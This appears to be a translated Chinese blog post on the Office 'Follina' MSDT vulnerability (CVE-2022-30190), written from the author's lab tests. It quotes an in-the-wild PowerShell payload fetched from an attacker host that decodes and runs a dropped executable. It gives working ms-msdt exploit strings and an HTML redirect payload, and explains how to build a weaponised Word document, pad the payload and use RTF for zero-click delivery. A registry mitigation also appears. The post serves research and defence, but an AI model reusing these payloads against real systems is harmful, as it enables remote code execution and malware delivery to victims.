Office Microsoft 支持诊断工具 (MSDT) 漏洞“Follina”

WGET 执行现在Bacco (@0xBacco) / Twitter让我做一些测试，他偶然发现如果他们通过 powershell (iwr) 执行“wget target”，那么代码就会执行。所以我用 SYSMON 和 PROCESS MONITOR 把命令扔进了实验室，然后...... WTF！

wget 不提示执行代码

这个漏洞可以通过多种方法来传递，但在野外看到的方法是网络钓鱼。我没有详细说明确切的样本流程，但它可能会像这个高级视图一样被利用：

应该注意的是，如果文件具有网络标记（备用数据流区域标识符）并且启用了保护模式，则该链不会在 docx 版本中触发，但是威胁参与者可以通过一些方法绕过这一点（例如包装文件) 或者干脆使用 RTF 格式！！！（RTF 不受文件预览和 MOTW 保护）

恶意软件执行

具体示例显示以下托管在网络服务器 (xmlformats[.com]) 上

$cmd = "c:windowssystem32cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:userspublic&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

禁用漏洞利用

组策略

您可以通过 GPO 禁用此功能（与 reg hacks 相比，这是一种完全受支持的方法）

您通过注册表执行此操作：

reg add “HKLMSOFTWAREPoliciesMicrosoftWindowsScriptedDiagnostics” /t REG_DWORD /v EnableDiagnostics /d 0

或通过 GUI（本地）或通过 GPMC 等在域环境中。

https://twitter.com/gentilkiwi/status/1531384447219781634?s=20&t=bt_RKO0zsGMfuPQpO2aRKA

漏洞利用如何运作？

TLDR：我把我的文件放在这里：

https://github.com/mr-r3b00t/msdt_pwn

为了创建它，我们使用了：

05-2022-0438.doc (MD5: 52945AF1DEF85B171870B31FA4782E52) – 交互式分析 – ANY.RUN

MSDT 可用于执行代码：例如

ms-msdt:/id PCWDiagnostic /skip force /param “IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../ ../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO”

Word 文档加载一个模板，该模板具有指向 HTML 文件的远程链接，该 HTML 文件使用 MSDT 加载和执行代码 (PowerShell)。

它可能加载的文件（HTML）可能看起来像这样：（这是来自@mkolsek 我的原始模块有一些问题）

参考：https://twitter.com/mkolsek/status/1531217733546823681?s=20&t=STUQ_ElmlfqccTRknRGGWg

window.location.href = “ms-msdt:/id PCWDiagnostic /skip force /param ”IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../.. /../../../../../../../../../../../../Windows/System32/mpsigstub.exe ””;

有效负载必须至少为 4096 字节（感谢 John H！）所以填充这个（你可以转储大量评论的废话！）

word文档结构：

Word 文档是 ZIP 文件（所以只需解压缩文件，如果您想要更轻松的点击体验，请重命名为 zip）它们包含几个目录：

在“词”里面我们有

在 _rels 我们有：

这是包含指向恶意 html 的外部链接的位置：

我们已经使这个“安全”

现在我们将所有文件压缩备份并重命名为 doc。

我们已经确定了入口点并启用了 POC 测试工具。

成分

我们可以在一台 Windows 机器（客户端或服务器）上完成这一切：

在 Windows 客户端上，我们可以安装 IIS（或者简单地使用 python 网络服务器等）

现在我们有一个本地网络服务器，我们加载 poc.html

这是使用 Windows 11 和 Office 365 Pro。

如您所见，这并不成功！（一件好事！）

我只是将一些较旧的东西（Windows 10 和 Office 2016）部署到实验室，所以很快会再次更新！

好的，所以我使用 Office 2016 部署到 Windows 10 x64 并成功执行（感谢修复 html 错误）

RTF

这也可以以 RTF 格式部署，当与文件预览结合使用时，可以实现零点击攻击。